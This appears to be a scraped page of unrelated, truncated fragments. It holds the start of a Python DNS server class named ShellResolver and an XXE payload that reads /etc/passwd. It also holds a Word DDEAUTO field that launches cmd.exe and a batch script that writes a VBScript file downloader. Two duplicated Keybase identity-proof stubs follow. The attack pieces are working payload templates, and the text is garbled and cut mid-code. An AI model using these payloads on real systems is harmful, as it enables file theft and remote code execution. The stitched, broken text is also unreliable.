# -*- coding: utf-8 -*-
from __future__ import print_function
from dnslib import RR,QTYPE,RCODE,TXT,parse_time
from dnslib.label import DNSLabel
from dnslib.server import DNSServer,DNSHandler,BaseResolver,DNSLogger
class ShellResolver(BaseResolver):
    def __init__(self,ttl,ans):

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;

{ DDEAUTO c:\\windows\system32\\cmd.exe "/k calc.exe" }

echo Set args = WScript.Arguments > wget-bin.vbs
echo Url = args.Item(0) >> wget-bin.vbs
echo Path = args.Item(1) >> wget-bin.vbs
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> wget-bin.vbs
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> wget-bin.vbs
echo xHttp.Open "GET", Url, False >> wget-bin.vbs
echo xHttp.Send >> wget-bin.vbs
echo with bStrm >> wget-bin.vbs
echo .type = 1 >> wget-bin.vbs
echo .open >> wget-bin.vbs

Keybase proof

I hereby claim:

  • I am maxnad on github.
  • I am mnadeau (https://keybase.io/mnadeau) on keybase.
  • I have a public key ASAb3g4_1d_5DSJ4VOPA8Y4fxMSFNgKCnelxD1ieT26cKQo

To claim this, I am signing this object:

Keybase proof

I hereby claim:

  • I am maxnad on github.
  • I am mnadeau (https://keybase.io/mnadeau) on keybase.
  • I have a public key ASChybmTxFAfG1cjGj2JacCfAZjijhCgR3EaMYqO_KkxPgo

To claim this, I am signing this object: